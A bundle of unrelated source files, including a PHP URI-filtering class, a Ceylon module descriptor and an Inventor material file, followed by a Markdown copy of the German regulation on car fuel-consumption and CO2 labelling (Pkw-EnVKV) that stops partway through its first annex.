if ($fragment != '') {
$uri .= '#' . $fragment;
}
return $uri;
}
/**
* Is a given port non-standard for the current scheme?
*
* @param string $scheme
* @param int $port
*
* @return bool
*/
private static function isNonStandardPort($scheme, $port)
{
return !isset(self::$schemes[$scheme]) || $port !== self::$schemes[$scheme];
}
/**
* @param string $scheme
*
* @return string
*
* @throws \InvalidArgumentException If the scheme is invalid.
*/
private function filterScheme($scheme)
{
if (!is_string($scheme)) {
throw new \InvalidArgumentException('Scheme must be a string');
}
return strtolower($scheme);
}
/**
* @param string $host
*
* @return string
*
* @throws \InvalidArgumentException If the host is invalid.
*/
private function filterHost($host)
{
if (!is_string($host)) {
throw new \InvalidArgumentException('Host must be a string');
}
return strtolower($host);
}
/**
* @param int|null $port
*
* @return int|null
*
* @throws \InvalidArgumentException If the port is invalid.
*/
private function filterPort($port)
{
if ($port === null) {
return null;
}
$port = (int) $port;
if (1 > $port || 0xffff < $port) {
throw new \InvalidArgumentException(
sprintf('Invalid port: %d. Must be between 1 and 65535', $port)
);
}
return self::isNonStandardPort($this->scheme, $port) ? $port : null;
}
/**
* Filters the path of a URI
*
* @param string $path
*
* @return string
*
* @throws \InvalidArgumentException If the path is invalid.
*/
private function filterPath($path)
{
if (!is_string($path)) {
throw new \InvalidArgumentException('Path must be a string');
}
return preg_replace_callback(
'/(?:[^' . self::$charUnreserved . self::$charSubDelims . '%:@\/]++|%(?![A-Fa-f0-9]{2}))/',
[$this, 'rawurlencodeMatchZero'],
$path
);
}
/**
* Filters the query string or fragment of a URI.
*
* @param string $str
*
* @return string
*
* @throws \InvalidArgumentException If the query or fragment is invalid.
*/
private function filterQueryAndFragment($str)
{
if (!is_string($str)) {
throw new \InvalidArgumentException('Query and fragment must be a string');
}
return preg_replace_callback(
'/(?:[^' . self::$charUnreserved . self::$charSubDelims . '%:@\/\?]++|%(?![A-Fa-f0-9]{2}))/',
[$this, 'rawurlencodeMatchZero'],
$str
);
}
private function rawurlencodeMatchZero(array $match)
{
return rawurlencode($match[0]);
}
}
| {
"pile_set_name": "Github"
} |
<?php
namespace Foo\BarScoped {
class TestClass {
}
}
| {
"pile_set_name": "Github"
} |
"Some module"
license ("http://www.apache.org/licenses/LICENSE-2.0.html")
module org.eclipse.ceylon.compiler.typechecker.test.modulec "1" {
shared import "org.eclipse.ceylon.compiler.typechecker.test.moduled" "1";
} | {
"pile_set_name": "Github"
} |
#Inventor V1.0 ascii
Material {
ambientColor 0 0.03109788 0
diffuseColor 0 0.12245365 0
specularColor 0.35663385 0.35663385 0.35663385
emissiveColor 0 0 0
shininess 0.08108644
transparency 0
}
| {
"pile_set_name": "Github"
} |
---
Title: Verordnung über Verbraucherinformationen zu Kraftstoffverbrauch, CO 2 -Emissionen
und Stromverbrauch neuer Personenkraftwagen
jurabk: Pkw-EnVKV
layout: default
origslug: pkw-envkv
slug: pkw-envkv
---
# Verordnung über Verbraucherinformationen zu Kraftstoffverbrauch, CO 2 -Emissionen und Stromverbrauch neuer Personenkraftwagen (Pkw-EnVKV)
Ausfertigungsdatum
: 2004-05-28
Fundstelle
: BGBl I: 2004, 1037
Zuletzt geändert durch
: Art. 3 G v. 10.5.2012 I 1070
Diese Verordnung dient der Umsetzung der Richtlinie 1999/94/EG des
Europäischen Parlaments und des Rates vom 13. Dezember 1999 über die
Bereitstellung von Verbraucherinformationen über den
Kraftstoffverbrauch und CO
2 -Emissionen beim Marketing für neue Personenkraftwagen
(ABl. EG 2000 Nr. L 12 S. 16), zuletzt geändert durch die Verordnung
(EG) Nr. 1882/2003 des Europäischen Parlaments und des Rates vom 29.
September 2003 (ABl. EU Nr. L 284 S. 1).
## Eingangsformel
Auf Grund des § 1 Abs. 1 Nr. 1 in Verbindung mit § 1 Abs. 2 und 3 Nr.
1 und 3 bis 5 des Energieverbrauchskennzeichnungsgesetzes vom 30.
Januar 2002 (BGBl. I S. 570), von denen § 1 Abs. 1 und 2 durch Artikel
135 der Verordnung vom 25. November 2003 (BGBl. I S. 2304) geändert
worden ist, verordnet das Bundesministerium für Wirtschaft und Arbeit
im Einvernehmen mit dem Bundesministerium für Umwelt, Naturschutz und
Reaktorsicherheit:
## § 1 Kennzeichnungspflicht
(1) Hersteller und Händler, die neue Personenkraftwagen ausstellen,
zum Kauf oder Leasing anbieten oder für diese werben, haben dabei
Angaben über den Kraftstoffverbrauch, die CO
2 -Emissionen und gegebenenfalls den Stromverbrauch nach
Maßgabe der §§ 3 bis 5 sowie der Anlagen 1 bis 4 zu machen.
(2) Bei den Angaben sind zu verwenden als Einheit
1. für
a) den Kraftstoffverbrauch Liter je 100 Kilometer (l/100 km),
b) den Verbrauch von Erdgas- oder Biogas als Kraftstoff abweichend von a)
Kilogramm je 100 Kilometer (kg/100 km), wobei der aus der EG-
Übereinstimmungsbescheinigung (Certificate of Conformity – CoC)
stammende und in Kubikmeter je 100 Kilometer (m
3 /100 km) angegebene Wert vom Hersteller in
Kilogramm je 100 Kilometer (kg/100 km) gemäß dem in Anhang XII Absatz
2\.3 der Verordnung (EG) Nr. 715/2007 des Europäischen Parlaments und
des Rates vom 20. Juni 2007 über die Typgenehmigung von
Kraftfahrzeugen (Euro 5 und Euro 6) und über den Zugang zu Reparatur-
und Wartungsinformationen für Fahrzeuge (ABl. L 171 vom 29.6.2007, S.
1) in Verbindung mit der Verordnung (EG) Nr. 692/2008 des Europäischen
Parlaments und des Rates vom 18. Juli 2008 zur Durchführung und
Änderung der Verordnung (EG) Nr. 715/2007 des Europäischen Parlaments
und des Rates über die Typgenehmigung von Kraftfahrzeugen (Euro 5 und
Euro 6) und über den Zugang zu Reparatur- und Wartungsinformationen
für Fahrzeuge (ABl. L 199 vom 28.7.2008, S. 1) festgelegten
Bezugsdichtewert für Erdgas umzurechnen ist,
c) den Stromverbrauch für rein elektrisch betriebene Fahrzeuge,
Brennstoffzellenfahrzeuge und für extern aufladbare
Hybridelektrofahrzeuge Kilowattstunden je 100 Kilometer (kWh/100 km),
wobei der aus der EG-Übereinstimmungsbescheinigung (Certificate of
Conformity – CoC) stammende und in Wattstunden je Kilometer (Wh/km)
angegebene Wert vom Hersteller in Kilowattstunden je 100 Kilometer
(kWh/100 km) umzurechnen ist.
Der Verbrauch ist jeweils bis zur ersten Dezimalstelle nach
kaufmännischen Rundungsregeln auf- oder abgerundet anzugeben.
2. für die CO
2 -Emissionen Gramm je Kilometer (g/km), jeweils auf
eine ganze Zahl nach kaufmännischen Rundungsregeln auf- oder
abgerundet.
## § 2 Begriffsbestimmungen
Im Sinne dieser Verordnung
1. sind "neue Personenkraftwagen" Kraftfahrzeuge nach Artikel 2 Nr. 1 der
Richtlinie 1999/94/EG des Europäischen Parlaments und des Rates vom
13\. Dezember 1999 über die Bereitstellung von Verbraucherinformationen
über den Kraftstoffverbrauch und CO
2 -Emissionen beim Marketing für neue
Personenkraftwagen (ABl. L 12 vom 18.1.2000, S. 16), zuletzt geändert
durch die Verordnung (EG) Nr. 1137/2008 des Europäischen Parlaments
und des Rates vom 22. Oktober 2008 (ABl. L 311 vom 21.11.2008, S. 1),
die noch nicht zu einem anderen Zweck als dem des Weiterverkaufs oder
der Auslieferung verkauft wurden;
2. ist "Hersteller" der in der Zulassungsbescheinigung Teil I genannte
Hersteller oder, wenn dieser nicht in Deutschland ansässig ist, dessen
bevollmächtigter Vertreter in Deutschland;
3. ist "Händler" jeder, der in Deutschland neue Personenkraftwagen
ausstellt oder zum Kauf oder Leasing anbietet;
4. ist "Verkaufsort" ein Ort, an dem neue Personenkraftwagen ausgestellt
oder zum Kauf oder Leasing angeboten werden, insbesondere ein
Ausstellungsraum oder ein Vorhof; als Verkaufsorte gelten auch
Handelsmessen, auf denen neue Personenkraftwagen der Öffentlichkeit
vorgestellt werden;
5. ist "offizieller Kraftstoffverbrauch" der Verbrauch eines neuen
Personenkraftwagens nach Artikel 2 Nr. 5 der Richtlinie 1999/94/EG;
6. sind "offizielle spezifische CO
2 -Emissionen" die Emissionen eines neuen
Personenkraftwagens nach Artikel 2 Nr. 6 der Richtlinie 1999/94/EG;
6a. ist der „offizielle Stromverbrauch“ der auf der Grundlage der
Verordnung (EG) Nr. 715/2007 des Europäischen Parlaments und des Rates
vom 20. Juni 2007 über die Typgenehmigung von Kraftfahrzeugen (Euro 5
und Euro 6) und über den Zugang zu Reparatur- und
Wartungsinformationen für Fahrzeuge (ABl. L 171 vom 29.6.2007, S. 1)
in Verbindung mit der Verordnung (EG) Nr. 692/2008 des Europäischen
Parlaments und des Rates vom 18. Juli 2008 zur Durchführung und
Änderung der Verordnung (EG) Nr. 715/2007 des Europäischen Parlaments
und des Rates über die Typgenehmigung von Kraftfahrzeugen (Euro 5 und
6) und über den Zugang zu Reparatur- und Wartungsinformationen für
Fahrzeuge (ABl. L 199 vom 28.7.2008, S. 1) ermittelte Verbrauch an
elektrischer Energie;
6b. ist „anderer Energieträger“ elektrischer Strom;
6c. ist „Masse des fahrbereiten Fahrzeugs“ die in Anhang IX Teil 1 der
Verordnung (EG) Nr. 385/2009 der Kommission vom 7. Mai 2009 zur
Ersetzung des Anhangs IX der Richtlinie 2007/46/EG des Europäischen
Parlaments und des Rates zur Schaffung eines Rahmens für die
Genehmigung von Kraftfahrzeugen und Kraftfahrzeuganhängern sowie von
Systemen, Bauteilen und selbstständigen technischen Einheiten für
diese Fahrzeuge („Rahmenrichtlinie“) (ABl. L 118 vom 13.5.2009, S. 13)
definierte Masse, sofern in dieser Verordnung nichts Abweichendes
geregelt ist; bei Fahrzeugen, die nicht über eine EG-
Übereinstimmungsbescheinigung (Certificate of Conformity – CoC) im
Sinne der Verordnung (EG) Nr. 385/2009 verfügen, ist zur Bestimmung
der „Masse des fahrbereiten Fahrzeugs“ die in Anhang I Nummer 2.6 der
Richtlinie 2007/46/EG des Europäischen Parlaments und des Rates zur
Schaffung eines Rahmens für die Genehmigung von Kraftfahrzeugen und
Kraftfahrzeuganhängern sowie von Systemen, Bauteilen und
selbstständigen technischen Einheiten für diese Fahrzeuge (ABl. L 263
vom 9.10.2007, S. 1) definierte Masse zugrunde zu legen und bei Angabe
eines Bereichs für die Masse im Rahmen dieser Verordnung der höhere
Wert heranzuziehen;
6d. ist unter dem Begriff „Kraftstoff“ im Sinne dieser Verordnung der vom
Hersteller empfohlene Kraftstoff mit derjenigen Bezeichnung anzugeben,
die zur Bekanntmachung der Kraftstoffqualität für den Betrieb von
Kraftfahrzeugen nach der Verordnung über die Beschaffenheit und die
Auszeichnung der Qualitäten von Kraft- und Brennstoffen in der jeweils
geltenden Fassung verwendet werden muss; wobei bei Ottokraftstoffen
und Dieselkraftstoffen auf den Zusatz „schwefelfrei“ im Rahmen dieser
Verordnung verzichtet werden kann;
7. ist "Hinweis auf den Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch" eine Angabe
zur Information des Verbrauchers über den offiziellen
Kraftstoffverbrauch, die offiziellen spezifischen CO
2 -Emissionen und den offiziellen Stromverbrauch des
Personenkraftwagens;
8. ist "Leitfaden über den Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch" eine
Zusammenstellung der Werte des offiziellen Kraftstoffverbrauchs, der
offiziellen spezifischen CO
2 -Emissionen und des offiziellen Stromverbrauchs
aller Modelle, die am Neuwagenmarkt in Deutschland angeboten werden;
9. sind "Werbeschriften" alle Druckschriften, die für die Vermarktung von
Fahrzeugen und zur Werbung in der Öffentlichkeit verwendet werden,
insbesondere technische Anleitungen, Broschüren, Anzeigen in
Zeitungen, Magazinen und Fachzeitschriften sowie Plakate;
10. ist "Verbreitung in elektronischer Form" die Verbreitung von
Informationen, die mittels Geräten für die elektronische Verarbeitung
und Speicherung (einschließlich digitaler Kompression) von Daten am
Ausgangspunkt gesendet und am Endpunkt empfangen und vollständig über
Draht, über Funk, auf optischem oder anderem elektromagnetischen Wege
gesendet, weitergeleitet und empfangen werden;
11. ist "Werbematerial" jede Form von Informationen, die für Vermarktung
und Werbung für Verkauf und Leasing neuer Personenkraftwagen in der
Öffentlichkeit verwendet werden; dies umfasst auch Texte und Bilder
auf Internetseiten, soweit für den Inhalt der Angaben nach anderen
Rechtsvorschriften Fahrzeughersteller oder Unternehmen, Organisationen
und Personen verantwortlich sind, die neue Personenkraftwagen zum Kauf
oder Leasing anbieten, sowie Darstellungen auf Internetseiten von
Handelsmessen, auf denen neue Fahrzeuge öffentlich vorgestellt werden;
12. ist "Werbeempfänger", wer Werbematerial, insbesondere zu
Informationszwecken, zur Kenntnis nimmt;
13. sind "elektronische, magnetische oder optische Speichermedien" alle
physikalischen Materialien, auf denen Informationen in elektronischer
Form aufgezeichnet werden und die zur Information der Öffentlichkeit
genutzt werden können;
14. ist "Fabrikmarke" der Handelsname des Herstellers nach Artikel 2 Nr.
10 der Richtlinie 1999/94/EG;
15. ist "Modell" die Handelsbezeichnung eines Fahrzeugs, bestehend aus
Fabrikmarke, Typ sowie gegebenenfalls Variante und Version eines
Personenkraftwagens;
16. sind "Typ", "Variante" und "Version" die Unterteilungen einer
bestimmten Fabrikmarke nach Artikel 2 Nr. 12 der Richtlinie
1999/94/EG.
## § 3 Hinweis auf Kraftstoffverbrauch, CO 2 -Emissionen und Stromverbrauch sowie Aushang am Verkaufsort
(1) Wer einen neuen Personenkraftwagen ausstellt oder zum Kauf oder
Leasing anbietet, hat dafür Sorge zu tragen, dass
1. ein Hinweis auf den offiziellen Kraftstoffverbrauch, die offiziellen
spezifischen CO
2 -Emissionen und gegebenenfalls den offiziellen
Stromverbrauch am Fahrzeug oder in dessen unmittelbarer Nähe so
angebracht ist, dass dieser deutlich sichtbar ist und eindeutig
zugeordnet werden kann. Der Hinweis muss die CO
2 -Effizienzklasse nach § 3a Absatz 2 enthalten
sowie den Anforderungen der Anlage 1 entsprechen, die zum Zeitpunkt
des Erstellens des Hinweises aktuell sind. Das Datum der Erstellung
des Hinweises ist in dem vorgesehenem Feld im Sinne der Anlage 1
Nummer 7 anzugeben,
2. ein Aushang am Verkaufsort deutlich sichtbar angebracht wird, der die
CO
2 -Effizienzklassen, die Werte des offiziellen
Kraftstoffverbrauchs, der offiziellen spezifischen CO
2 -Emissionen und gegebenenfalls des offiziellen
Stromverbrauchs aller Modelle neuer Personenkraftwagen enthält, die am
Verkaufsort ausgestellt oder an diesem oder über diesen Verkaufsort
zum Kauf oder Leasing angeboten werden; der Aushang muss den
Anforderungen der Anlage 2 entsprechen.
(2) Der Hinweis und der Aushang nach Absatz 1 können auch elektronisch
durch Bildschirmanzeige dargestellt werden, soweit die übrigen in
Absatz 1 sowie in den Anlagen 1 und 2 angeführten Voraussetzungen
eingehalten werden.
(3) Die Hersteller haben den Händlern, denen sie neue
Personenkraftwagen liefern, auf Anforderung unverzüglich und
unentgeltlich die Angaben zu übermitteln, die erforderlich sind, um
den Hinweis und den Aushang nach Absatz 1 zu erstellen.
## § 3a CO 2 -Effizienzklassen
(1) Der Hersteller hat die CO
2 -Effizienz des Fahrzeugs durch Angabe einer CO
2 -Effizienzklasse auszuweisen. Er hat dazu die Abweichung
der offiziellen spezifischen CO
2 -Emissionen des Fahrzeugs von einem fahrzeugspezifischen
Referenzwert zu ermitteln. Der Referenzwert ist wie folgt zu
bestimmen:
Referenzwert (in g CO
2 /km) = 36,59079 + a × M
Dabei ist:
M
= Masse des fahrbereiten Fahrzeugs in Kilogramm (kg),
a
= 0,08987.
Der Referenzwert ist als ganze Zahl nach kaufmännischen Rundungsregeln
auf- oder abzurunden. Die Abweichung der offiziellen spezifischen CO
2 -Emissionen des Fahrzeugs vom Referenzwert ist durch die
Differenz der beiden Angaben auszudrücken und wie folgt zu berechnen:

Dabei ist:
CO
2Ref= fahrzeugspezifischer Referenzwert der CO
2 -Emissionen,
CO
2PKW= offizielle spezifische CO
2 -Emissionen des Fahrzeugs.
Der Prozentwert ist auf zwei Dezimalstellen nach dem Komma nach
kaufmännischen Rundungsregeln auf- oder abzurunden.
(2) Entsprechend der Abweichung vom Referenzwert wird das Fahrzeug
einer der nachfolgend bestimmten CO
2 -Effizienzklassen zugewiesen.
* * CO
2 -Effizienzklasse
* Bandbreite der Klassen Abweichung vom Referenzwert
* * A +
* * -37 %
* * A
* -36,99 % bis -28 %
* * B
* -27,99 % bis -19 %
* * C
* -18,99 % bis -10 %
* * D
* -9,99 % bis -1 %
* * E
* -0,99 % bis +8 %
* * F
* +8,01 % bis +17 %
* * G
* > +17,01 %
(3) Erfüllt fünf vom Hundert der zugelassenen Fahrzeuge in einem
Kalenderjahr die Anforderungen der nächst effizienteren Klassen A ++
oder
A +++, werden diese Klassen entsprechend den nachfolgend
bestimmten CO
2 -Effizienzklassen eingeführt, gegebenenfalls auch
gleichzeitig. Das Bundesministerium für Wirtschaft und Technologie
überprüft jährlich das Erreichen des Fünf-vom-Hundert-Kriteriums für
die Einführung der nächst höheren CO
2 -Effizienzklasse. Diese Überprüfung erfolgt auf der
Basis der Zulassungszahlen und Typdaten des Kraftfahrt-Bundesamtes und
unter Zugrundelegung der offiziellen spezifischen CO
2 -Emissionen und der Masse des fahrbereiten Fahrzeugs im
Sinne der Richtlinie 2007/46/EG des Europäischen Parlaments und des
Rates vom 5. September 2007 zur Schaffung eines Rahmens für die
Genehmigung von Kraftfahrzeugen und Kraftfahrzeuganhängern sowie von
Systemen, Bauteilen und selbstständigen technischen Einheiten für
diese Fahrzeuge (ABl. L 263 vom 9.10.2007, S. 1) sowie optionaler,
ergänzender versions- oder fahrzeugspezifischer Meldungen der
Hersteller an das Kraftfahrt-Bundesamt, wobei in den Fällen, in denen
in den Typgenehmigungsdokumenten ein Bereich für die Masse angegeben
ist, für die Berechnung im Sinne des § 3a Absatz 3 dieser Verordnung
der höhere Wert heranzuziehen ist. Das Bundesministerium für
Wirtschaft und Technologie veröffentlicht das Ergebnis der Prüfung und
gegebenenfalls die Notwendigkeit, die Klassen
A ++ beziehungsweise
A +++ einzuführen bis spätestens 30. Juni eines jeden
Jahres im Bundesanzeiger. Die neue Klasse ist nach drei Monaten ab dem
Datum der Veröffentlichung im Bundesanzeiger anzuwenden.
* * CO
2 -Effizienzklasse
* Bandbreite der Klassen Abweichung vom Referenzwert
* * A ++
* * -46 %
* * A +
* -45,99 % bis -37 %
* * CO
2 -Effizienzklasse
* Bandbreite der Klassen Abweichung vom Referenzwert
* * A +++
* * -55 %
* * A ++
* -54,99 % bis -46 %
Spätestens drei Jahre nach Inkrafttreten dieser Verordnung wird das
Bundesministerium für Wirtschaft und Technologie die
Berechnungsgrundlagen für den Referenzwert, insbesondere Alternativen
zur Bezugsgröße Masse, und den Anteil der zugelassenen Fahrzeuge in
den Klassen insgesamt überprüfen und gegebenenfalls die
Energieverbrauchskennzeichnung für Personenkraftwagen durch Änderung
dieser Verordnung anpassen.
## § 4 Leitfaden zu Kraftstoffverbrauch, CO 2 -Emissionen und Stromverbrauch
(1) Die Hersteller bestimmen eine Stelle, die in ihrem Auftrag einen
einheitlichen Leitfaden über den Kraftstoffverbrauch, die CO
2 -Emissionen und den Stromverbrauch in gedruckter Form
erstellt und an Händler, Verbraucher und sonstige Interessenten
verteilt. Der Leitfaden ist mindestens einmal jährlich zu
aktualisieren. Die Hersteller teilen die nach Satz 1 bestimmte Stelle
dem Bundesministerium für Wirtschaft und Technologie mit; dieses gibt
die Stelle im Bundesanzeiger bekannt. Der Leitfaden ist von den
Herstellern auch im Internet zur Verfügung zu stellen.
(2) Der Leitfaden muss den Anforderungen der Anlage 3 entsprechen. Der
Entwurf des Teils I des Leitfadens bedarf der Genehmigung des
Bundesministeriums für Wirtschaft und Technologie im Einvernehmen mit
dem Bundesministerium für Umwelt, Naturschutz und Reaktorsicherheit
sowie dem Bundesministerium für Verkehr, Bau und Stadtentwicklung. Die
Genehmigung gilt als erteilt, wenn das Bundesministerium für
Wirtschaft und Technologie nicht innerhalb von zwei Monaten nach
Zugang des Entwurfs die Genehmigung abgelehnt hat. Der Zugang des
Entwurfs ist dem Antragsteller unverzüglich schriftlich zu bestätigen.
(3) Händler und Hersteller haben den Leitfaden am Verkaufsort an am
Kauf oder Leasing Interessierte (Kunden) auf Anfrage unverzüglich und
unentgeltlich auszuhändigen. Der Leitfaden kann mit Einverständnis des
Kunden diesem auch auf elektronischen, magnetischen oder optischen
Speichermedien übergeben oder in elektronischer Form übermittelt
werden. Ist am Verkaufsort aus Gründen, die der Händler oder
Hersteller nicht zu vertreten hat, ein gedrucktes Exemplar des
Leitfadens nicht verfügbar, kann die Verpflichtung nach Satz 1 auch
dadurch erfüllt werden, dass dem Kunden ein Ausdruck des im Internet
zur Verfügung gestellten Leitfadens unentgeltlich ausgehändigt wird.
(4) Die Hersteller müssen sicherstellen, dass
1. für Verbraucher auf Anfrage ein Leitfaden kostenlos bei der nach
Absatz 1 Satz 1 bestimmten Stelle erhältlich ist;
2. durch die nach Absatz 1 Satz 1 bestimmte Stelle Händlern unverzüglich
und unentgeltlich jeweils die Anzahl von Exemplaren des Leitfadens zur
Verfügung gestellt wird, die notwendig ist, damit diese Händler ihre
Verpflichtungen nach Absatz 3 Satz 1 erfüllen können; für die
Zusendung können die Versandkosten in Rechnung gestellt werden.
(5) Hersteller und diejenigen, die im eigenen Namen neue
Personenkraftwagen zum Verkauf einführen, ohne Hersteller nach § 2 Nr.
2 zu sein, haben an die von den Herstellern nach Absatz 1 Satz 1
bestimmte Stelle jeweils unverzüglich, spätestens zum Beginn eines
jeden Quartals, die folgenden Angaben zu übermitteln:
1. Bezeichnungen der Modelle jeder Fabrikmarke, die sie in Deutschland
zum Zeitpunkt der Veröffentlichung im Handel haben und - soweit
bereits bekannt - im Restjahr sowie im folgenden Kalenderjahr in den
Handel bringen werden,
2. zu den unter Nummer 1 genannten Modellen zusätzlich jeweils den
Hubraum, die Leistung, die Getriebeart, die Masse des Fahrzeugs, die
Kraftstoffart, gegebenenfalls den anderen Energieträger, den
offiziellen Kraftstoffverbrauch, die offiziellen spezifischen CO
2 -Emissionen und gegebenenfalls den offiziellen
Stromverbrauch.
## § 5 Werbung
(1) Hersteller und Händler, die Werbeschriften erstellen, erstellen
lassen, weitergeben oder auf andere Weise verwenden, haben
sicherzustellen, dass in den Werbeschriften Angaben über den
offiziellen Kraftstoffverbrauch und die offiziellen spezifischen CO
2 -Emissionen der betreffenden Modelle neuer
Personenkraftwagen nach Maßgabe von Abschnitt I der Anlage 4 gemacht
werden.
(2) Absatz 1 Satz 1 gilt entsprechend für
1. in elektronischer Form verbreitetes Werbematerial,
2. Werbung durch elektronische, magnetische oder optische Speichermedien;
hiervon ausgenommen sind Hörfunkdienste und audiovisuelle
Mediendienste nach Artikel 1 Buchstabe a der Richtlinie 2010/13/EU des
Europäischen Parlaments und des Rates vom 10. März 2010 zur
Koordinierung bestimmter Rechts- und Verwaltungsvorschriften der
Mitgliedstaaten über die Bereitstellung audiovisueller Mediendienste
(Richtlinie über audiovisuelle Mediendienste), (ABl. L 95 vom
15\.4.2010, S. 1). Die Angaben müssen nach Maßgabe der Abschnitte II
und III der Anlage 4 erfolgen.
(3) Die Verpflichtungen der Hersteller nach § 3 Abs. 3 gelten
entsprechend für Angaben, die erforderlich sind, um Werbeschriften,
zur Verbreitung in elektronischer Form bestimmtes Werbematerial und
elektronische, magnetische oder optische Speichermedien nach den
Absätzen 1 und 2 zu erstellen.
## § 6 Missbräuchliche Verwendung von Bezeichnungen
Es ist verboten, in nach § 3 Abs. 1, § 3a Absatz 1 und 2, § 4 Abs. 2
Satz 1 und § 5 Abs. 1 und 2 bereitzustellenden Informationen zum
offiziellen Kraftstoffverbrauch, zu den offiziellen spezifischen CO
2 -Emissionen, zum offiziellen Stromverbrauch und zu den
CO
2 -Effizienzklassen andere den Vorschriften dieser
Verordnung nicht entsprechende Zeichen, Symbole oder Angaben zu
verwenden, sofern diese geeignet sind, beim Verbraucher zu
Verwechslungen zu führen.
## § 7 Ordnungswidrigkeiten
Ordnungswidrig im Sinne des § 15 Absatz 1 Nummer 1 des
Energieverbrauchskennzeichnungsgesetzes handelt, wer vorsätzlich oder
fahrlässig
1. entgegen § 3 Abs. 1 Nr. 1 in Verbindung mit Anlage 1 Teil A Abschnitt
I Nummer 1, Nummer 2 Satz 1, Nummern 3, 4, 6, 7 bis 8 Satz 1 bis 4
oder Satz 7 oder Nummer 9 oder Anlage 1 Teil B Abschnitt I Nummern 1
oder 2 oder § 3 Abs. 1 Nr. 2 in Verbindung mit Anlage 2 Abschnitt I
Nr. 1 bis 6, 8 oder 9 nicht dafür sorgt, dass ein Hinweis oder ein
Aushang angebracht wird,
2. entgegen § 3 Abs. 3, auch in Verbindung mit § 5 Abs. 3, oder § 4 Abs.
5 eine Angabe nicht, nicht richtig, nicht vollständig oder nicht
rechtzeitig übermittelt,
3. entgegen § 4 Abs. 3 Satz 1 den Leitfaden nicht, nicht richtig, nicht
vollständig, nicht in der vorgeschriebenen Weise oder nicht
rechtzeitig aushändigt,
4. entgegen § 5 Abs. 1, auch in Verbindung mit Abs. 2, nicht
sicherstellt, dass eine dort genannte Angabe gemacht wird oder
5. entgegen § 6 ein dort genanntes Zeichen oder Symbol oder eine dort
genannte Angabe verwendet.
## § 8 Weiterverwendung von Werbematerial
Werbeschriften und elektronische, magnetische oder optische
Speichermedien, die vor Inkrafttreten dieser Verordnung erstellt
wurden und die nach dieser Verordnung erforderlichen Angaben nicht
oder nicht in der erforderlichen Form enthalten, können noch drei
Monate nach Inkrafttreten dieser Verordnung verwendet werden.
## § 8a Übergangsregelungen
(1) Der Leitfaden im Sinne des § 4 muss spätestens am 2. Januar 2012
den Anforderungen dieser Verordnung entsprechen.
(2) Die Anforderungen dieser Verordnung an den Aushang im Sinne des §
3 Absatz 1 Nummer 2 gelten für jede Aktualisierung, die nach
Inkrafttreten dieser Verordnung vorgenommen wird.
## § 9 Inkrafttreten
Diese Verordnung tritt am ersten Tag des fünften auf die Verkündung
folgenden Kalendermonats in Kraft.
## Schlussformel
Der Bundesrat hat zugestimmt.
## Anlage 1 (zu § 3 Abs. 1 Nr. 1) Hinweis auf Kraftstoffverbrauch und CO 2 -Emissionen und Stromverbrauch
(Fundstelle: BGBl. I 2011, 1760 - 1765)
**A.**
**Anforderungen an den Hinweis gemäß § 3 Absatz 1 Nummer 1**
##
**Abschnitt I**
Inhalt und Gestaltung des Hinweises
auf den Kraftstoffverbrauch, die CO
## 2 **-Emissionen und den Stromverbrauch**
1. Die Größe des Hinweises beträgt 297 mm x 210 mm (DIN A4).
2. Der Hinweis ist einheitlich nach dem Formblatt in Abschnitt II dieser
Anlage zu erstellen. Die Anwendung einer vom Formblatt abweichenden
Schriftart auf dem Hinweis ist zulässig, soweit Schrifthöhe und
Schriftgrad unverändert bleiben und die gewählte Schriftart auch für
die anderen zum Fahrzeug am Verkaufsort gemachten Angaben verwendet
wird.
3. Nach der Überschrift „Information über Kraftstoffverbrauch, CO
2 -Emissionen und Stromverbrauch i.S.d. Pkw-EnVKV“
sind folgende Angaben zum Fahrzeug zu machen: Marke, Modell,
konkretisiert durch Typ, Variante und Version, Leistung, Kraftstoff,
andere Energieträger und Masse des Fahrzeugs.
4. Anschließend sind die zum jeweiligen Fahrzeug gehörigen und in der EG-
Übereinstimmungsbescheinigung (Certificate of Conformity – CoC) im
Sinne der Verordnung (EG) Nr. 385/2009 der Kommission vom 7. Mai 2009
zur Ersetzung des Anhangs IX der Richtlinie 2007/46/EG des
Europäischen Parlaments und des Rates zur Schaffung eines Rahmens für
die Genehmigung von Kraftfahrzeugen und Kraftfahrzeuganhängern sowie
von Systemen, Bauteilen und selbstständigen technischen Einheiten für
diese Fahrzeuge („Rahmenrichtlinie“) (ABl. L 118 vom 13.5.2009, S. 13)
ausgewiesenen Werte des offiziellen Kraftstoffverbrauchs (Testzyklen
innerorts und außerorts sowie kombiniert), der offiziellen
spezifischen CO
2 -Emissionen im kombinierten Testzyklus und
gegebenenfalls der offizielle Stromverbrauch im kombinierten
Testzyklus anzugeben. Bei Fahrzeugen, die nicht über eine EG-
Übereinstimmungsbescheinigung (Certificate of Conformity – CoC) im
Sinne der Verordnung (EG) Nr. 385/2009 verfügen, sind abweichend von
Satz 1 die in den Genehmigungsdokumenten im Sinne der Richtlinie
2007/46/EG des Europäischen Parlaments und des Rates zur Schaffung
eines Rahmens für die Genehmigung von Kraftfahrzeugen und
Kraftfahrzeuganhängern sowie von Systemen, Bauteilen und
selbstständigen technischen Einheiten für diese Fahrzeuge (ABl. L 263
vom 9.10.2007, S. 1) ausgewiesenen Werte des offiziellen
Kraftstoffverbrauchs (Testzyklen innerorts und außerorts sowie
kombiniert), der offiziellen spezifischen CO
2 -Emissionen im kombinierten Testzyklus und
gegebenenfalls der offizielle Stromverbrauch im kombinierten
Testzyklus anzugeben. Bei Fahrzeugen mit mehr als einem flüssigen oder
gasförmigen Energieträger sind unter „Kraftstoff“ sämtliche
Kraftstoffe getrennt durch einen Schrägstrich aufzuführen [z. B.
Super/Super Plus/E85], wobei derjenige Kraftstoff kursiv hervorzuheben
ist, auf den sich die Angaben zum offiziellen Kraftstoffverbrauch und
den offiziellen spezifischen CO
2 -Emissionen beziehen. Als Werte für den
offiziellen Kraftstoffverbrauch und die offiziellen spezifischen CO
2 -Emissionen werden die Werte desjenigen
Kraftstoffs mit den geringsten offiziellen spezifischen CO
2 -Emissionen eingetragen, wobei die Zahlenwerte für
den offiziellen Kraftstoffverbrauch und für die offiziellen
spezifischen CO
2 -Emissionen dieses Kraftstoffs kursiv
hervorzuheben sind. Bei rein elektrisch betriebenen Fahrzeugen wird
bei der Angabe der offiziellen spezifischen CO
2 -Emissionen eine „0“ eingetragen. Bei extern
aufladbaren Hybridelektrofahrzeugen und Brennstoffzellenfahrzeugen
sind nur die Werte des offiziellen Kraftstoffverbrauchs, der
